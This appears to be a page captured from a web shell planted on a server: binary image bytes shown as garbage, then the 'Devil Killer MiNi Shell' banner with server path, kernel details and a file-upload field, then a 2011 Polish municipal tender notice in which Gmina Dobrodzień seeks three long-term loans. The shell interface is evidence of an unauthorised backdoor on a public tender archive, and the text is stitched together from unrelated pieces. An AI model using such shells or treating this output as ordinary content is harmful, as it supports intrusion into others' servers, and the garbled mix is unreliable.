JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/427006-N-2011.html

<p class="kh_header"><b>Dobrodzień: Zaciągnięcie trzech długoterminowych kredytów</b><br>
<b>Numer ogłoszenia: 427006 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrodzień , Plac Wolności 1, 46-380 Dobrodzień, woj. opolskie, tel. 034 3575100, faks 034 3575100 w. 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrodzien.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaciągnięcie trzech długoterminowych kredytów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

  - w ramach części 1 zamówienia kredyt długoterminowy zaciągnięty w roku 2011 do kwoty 400.000,00 zł (słownie: czterysta tysięcy  złotych  00/100) na realizację inwestycji Budowa sieci kanalizacji sanitarnej i   deszczowej   oraz   sieci   wodociągowej   dla   nowych   działek  przy  ul.  Leśnej w Dobrodzieniu,
  - w ramach części 2 zamówienia kredyt długoterminowy   zaciągnięty   do   kwoty  1.500.000,00  zł (słownie:  jeden  milion pięćset  tysięcy  złotych  00/100) z przeznaczeniem na sfinansowanie planowanego w 2011 r. deficytu budżetu gminy,
  - w ramach części 3 zamówienia kredyt długoterminowy  zaciągnięty do kwoty 220.000,00 zł (słownie: dwieście dwadzieścia tysięcy złotych 00/100)  w  roku 2011  na realizację inwestycji Przebudowa drogi gminnej  nr  102983 O  -  ul.  Studzienna  oraz  drogi  gminnej  w 103004 O - ul. Zielona w miejscowości Dobrodzień.

 Kredyt w ramach części 1 zamówienia o następującym zakresie:

a)	okres kredytowania do 8 lat,
   b)  przewidziany termin postawienia środków finansowych do dyspozycji Zamawiającego od dnia podpisania umowy,
c)	dostępność kredytu:
- transza w wysokości do kwoty 400.000,00 zł płatna 28 grudnia 2011 r., 
 d)  spłata odsetek od zaciągniętego kredytu nastąpi w okresach miesięcznych, począwszy od  marca 2012 r.  płatnych w 27 dniu każdego miesiąca,
e)  spłata kredytu nastąpi w miesięcznych ratach kapitałowych, płatnych w 27 dniu każdego miesiąca, z uwzględnieniem karencji do 31.12.2014 r., począwszy od 2015 r. do 2018 r., zgodnie z poniższym harmonogramem:
-	w roku 2015: 67.000,00 zł, tzn. 11 miesięcznych rat po 5.600,00 zł i 1 rata w wysokości 5.400,00 zł, 
-	w roku 2016: 67.000,00 zł, tzn. 11 miesięcznych rat po 5.600,00 zł i 1 rata w wysokości 5.400,00 zł,
-	w roku 2017: 67.000,00 zł, tzn. 11 miesięcznych rat po 5.600,00 zł i 1 rata w wysokości 5.400,00 zł,
-	w roku 2018: 199.000,00 zł, tzn. 11 miesięcznych rat po 16.600,00 zł i 1 rata w wysokości 16.400,00 zł,
f)  w przypadku, gdy termin spłaty kredytu lub odsetek  przypadnie w dzień wolny od pracy, to Zamawiający ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie spłaty,
g)  oprocentowanie  kredytu zmienne w całym okresie kredytowania w oparciu o stawkę WIBOR  jedno miesięczny (WIBOR 1M) powiększony o proponowaną marżę banku,
h)  zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową, 
 i)   prowizja płatna w dniu uruchomienia transzy,
j)	 Zamawiający zastrzega sobie:
 - zmianę ilości, kwot i terminów uruchomienia transz kredytu, bez dodatkowych kosztów,
          - prawo wcześniejszej spłaty kredytu lub rezygnacji z części kredytu  bez dodatkowych  kosztów związanych z wcześniejszą spłatą,
 - odsetki będą naliczane wyłącznie od kapitału niespłaconego.

Kredyt w ramach części 2 zamówienia o następującym zakresie:

a)	okres kredytowania do 10 lat,
   b)  przewidziany termin postawienia środków finansowych do dyspozycji Zamawiającego od dnia podpisania umowy,
c)  dostępność kredytu:
- transza w wysokości do kwoty 1.000.000,00 zł płatna w dniu 28 grudnia 2011 r.,
- transza w wysokości do kwoty 500.000,00 zł płatna w dniu 29 grudnia 2011 r.,
 d) spłata odsetek od zaciągniętego kredytu nastąpi w okresach miesięcznych, począwszy od  marca 2012 r.  płatnych w 27 dniu każdego miesiąca,
e) spłata kredytu nastąpi w miesięcznych ratach kapitałowych, płatnych w 27 dniu każdego miesiąca, z uwzględnieniem karencji do 31.12.2012 r., począwszy od 2013 r., a następnie  w latach 2019 - 2020 r., zgodnie z poniższym harmonogramem:
      -  w roku 2013: 600.000,00 zł, tzn. miesięczne raty po 50.000,00 zł,
-	w roku 2019: 600.00,00 zł, tzn. miesięczne raty po 50.000,00 zł,
-	w roku 2020: 300.00,00 zł, tzn. miesięczne raty po 25.000,00 zł,
f)  w przypadku, gdy termin spłaty kredytu lub odsetek  przypadnie w dzień wolny od pracy, to Zamawiający ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie spłaty,
g) oprocentowanie  kredytu zmienne w całym okresie kredytowania w oparciu o stawkę WIBOR  jedno miesięczny (WIBOR 1M) powiększony o proponowaną marżę banku,
h)  zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową, 
 i)   prowizja płatna w dniu uruchomienia transzy,
j)	 Zamawiający zastrzega sobie:
 -  zmianę ilości, kwot i terminów uruchomienia transz kredytu, bez dodatkowych kosztów,
          - prawo wcześniejszej spłaty kredytu lub rezygnacji z części kredytu  bez dodatkowych kosztów związanych z wcześniejszą spłatą,
  - odsetki będą naliczane wyłącznie od kapitału niespłaconego.

Kredyt w ramach części 3 zamówienia o następującym zakresie:

a)	okres kredytowania do 8 lat,
   b)  przewidziany termin postawienia środków finansowych do dyspozycji Zamawiającego od dnia podpisania umowy,
c)  dostępność kredytu:
- transza w wysokości do kwoty 220.000,00 zł płatna w dniu 28 grudnia 2011 r.,
 d) spłata odsetek od zaciągniętego kredytu nastąpi w okresach miesięcznych, począwszy od  marca 2012 r.  płatnych w 27 dniu każdego miesiąca,
e) spłata kredytu nastąpi w miesięcznych ratach kapitałowych, płatnych w 27 dniu każdego miesiąca, z uwzględnieniem karencji do 31.12.2015 r., począwszy od 2016 r. do 2018 r., zgodnie z poniższym harmonogramem:
-	w roku 2016: 46.000,00 zł, tzn. 11 miesięcznych rat po 3.800,00 zł i 1 rata w wysokości 4.200,00 zł, 
-	w roku 2017: 46.000,00 zł, tzn. 11 miesięcznych rat po 3.800,00 zł i 1 rata w wysokości 4.200,00 zł,
-	w roku 2018: 128.000,00 zł, tzn. 11 miesięcznych rat po 10.700,00 zł i 1 rata w wysokości 10.300,00 zł,
 f)  w przypadku, gdy termin spłaty kredytu lub odsetek  przypadnie w dzień wolny od pracy, to Zamawiający ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie spłaty,
g)  oprocentowanie  kredytu zmienne w całym okresie kredytowania w oparciu o stawkę WIBOR  jedno miesięczny (WIBOR 1M) powiększony o proponowaną marżę banku,
h)  zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową, 
 i)  prowizja płatna w dniu uruchomienia transzy,
j)	Zamawiający zastrzega sobie:
- zmianę ilości, kwot i terminów uruchomienia transz kredytu, bez dodatkowych kosztów,
         - prawo wcześniejszej spłaty kredytu lub rezygnacji z części kredytu  bez dodatkowych kosztów związanych z wcześniejszą spłatą,
 - odsetki będą naliczane wyłącznie od kapitału niespłaconego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22 UST. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22 UST. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.). Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22 UST. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.). Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22 UST. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.). Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22 UST. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.). Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - zał. nr 1 do SPECYFIKACJI ISTONYCH WARUNKÓW ZAMÓWIENIA (SIWZ). Cena oferty powinna zawierać wynagrodzenie za wszystkie obowiązki przyszłego Wykonawcy, niezbędne do zrealizowania usługi objętej niniejszym przetargiem. Cena oferty powinna wynikać z załączonej tabelki wraz z dołączoną do niej szczegółową kalkulacją (dokładne wyliczenia każdej pozycji podanej w tabelce). 2. Upoważnienie/pełnomocnictwo do podpisania oferty o ile nie wynika ono z dokumentu, o którym mowa w punkcie 7.2 SIWZ. Pełnomocnictwo takie musi być złożone w formie i zakresie, o którym mowa w punkcie 14.7 SIWZ. 10.3. Projekt umowy przedstawiony przez Wykonawcę, uwzględniający istotne dla stron postanowienia zawarte w punkcie 31 SIWZ, które zostaną wprowadzone do treści zawieranej umowy w sprawie niniejszego zamówienia publicznego. Wszystkie wymienione w punktach 6 - 10 SIWZ dokumenty należy złożyć w oryginale lub w kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. Zamawiający będzie żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości, co do jej prawdziwości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.) strony dopuszczają możliwość zmiany umowy w następujących przypadkach: a) zmiany ilości, terminów dostępności transz kredytu, a także ich wysokości, b) zmniejszenia marży kredytu przez bank - na wniosek (propozycję) wybranego banku, który udzielił Zamawiającemu kredytu, c) zmiany ilości, terminów spłat rat kredytu, a także ich wysokości jeżeli Zamawiający będzie przewidywał trudności finansowe w dotrzymaniu określonego w SIWZ terminu spłat, d) zmiany ilości, terminów spłat odsetek, a także ich wysokości jeżeli Zamawiający będzie przewidywał trudności finansowe w dotrzymaniu określonego w SIWZ terminu spłat, e) skrócenia okresu spłaty kredytu oraz zmniejszenia kwoty kredytu - w przypadku uzyskania przez Zamawiającego ponadplanowych dochodów własnych, f) zmiany przeznaczenia kredytu - w przypadku zmiany budżetu Gminy Dobrodzień, g) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dobrodzien.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dobrodzieniu, ul. Plac Wolności 1, 46-380 Dobrodzień, pok. nr 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2011 godzina 12:00, miejsce: Urząd Miejski w Dobrodzieniu, Plac Wolności 1, 46-380 Dobrodzień, woj. opolskie, w Sekretariacie pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje rozliczenia w walutach obcych. Zamawiający nie przewiduje zwrotu kosztów udziału w niniejszym postępowaniu. Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.). Zamawiający, ze względu na specyfikę przedmiotu zamówienia, nie dopuszcza powierzenia przez Wykonawcę części bądź całości niniejszego zamówienia podwykonawcom. Zamawiający nie udzielił żadnych poręczeń. Zamawiający nie posiada żadnych zobowiązań z tytułu emisji obligacji. Kontrasygnata Skarbnika Gminy obejmuje również złożenie podpisu na blankiecie wekslowym. Zamawiający wystąpił o opinię Regionalnej Izby Obrachunkowej w sprawie zaciągnięcia w/w kredytów przez Gminę Dobrodzień (tj. kredytu w ramach części 1, 2 i 3 zamówienia). W strukturze Zamawiającego nie funkcjonują podmioty powiązane z nim kapitałowo. Stopa bezrobocia na terenie Gminy Dobrodzień na dzień 31.12.2010 r. wynosiła 4,12 %. Ilość mieszkańców Gminy Dobrodzień wynosiła: - na dzień 31.12.2009 r. 10093 mieszkańców, - na dzień 31.12.2010 r. 10049 mieszkańców.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kredyt długoterminowy zaciągnięty w roku 2011 do kwoty 400.000,00 zł (słownie: czterysta tysięcy  złotych  00/100) na realizację inwestycji Budowa sieci kanalizacji sanitarnej i   deszczowej   oraz   sieci   wodociągowej   dla   nowych   działek  przy  ul.  Leśnej w Dobrodzieniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	okres kredytowania do 8 lat,
   b)  przewidziany termin postawienia środków finansowych do dyspozycji Zamawiającego od dnia podpisania umowy,
c)	dostępność kredytu:
- transza w wysokości do kwoty 400.000,00 zł płatna 28 grudnia 2011 r., 
 d)  spłata odsetek od zaciągniętego kredytu nastąpi w okresach miesięcznych, począwszy od  marca 2012 r.  płatnych w 27 dniu każdego miesiąca,
e)  spłata kredytu nastąpi w miesięcznych ratach kapitałowych, płatnych w 27 dniu każdego miesiąca, z uwzględnieniem karencji do 31.12.2014 r., począwszy od 2015 r. do 2018 r., zgodnie z poniższym harmonogramem:
-	w roku 2015: 67.000,00 zł, tzn. 11 miesięcznych rat po 5.600,00 zł i 1 rata w wysokości 5.400,00 zł, 
-	w roku 2016: 67.000,00 zł, tzn. 11 miesięcznych rat po 5.600,00 zł i 1 rata w wysokości 5.400,00 zł,
-	w roku 2017: 67.000,00 zł, tzn. 11 miesięcznych rat po 5.600,00 zł i 1 rata w wysokości 5.400,00 zł,
-	w roku 2018: 199.000,00 zł, tzn. 11 miesięcznych rat po 16.600,00 zł i 1 rata w wysokości 16.400,00 zł,
f)  w przypadku, gdy termin spłaty kredytu lub odsetek  przypadnie w dzień wolny od pracy, to Zamawiający ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie spłaty,
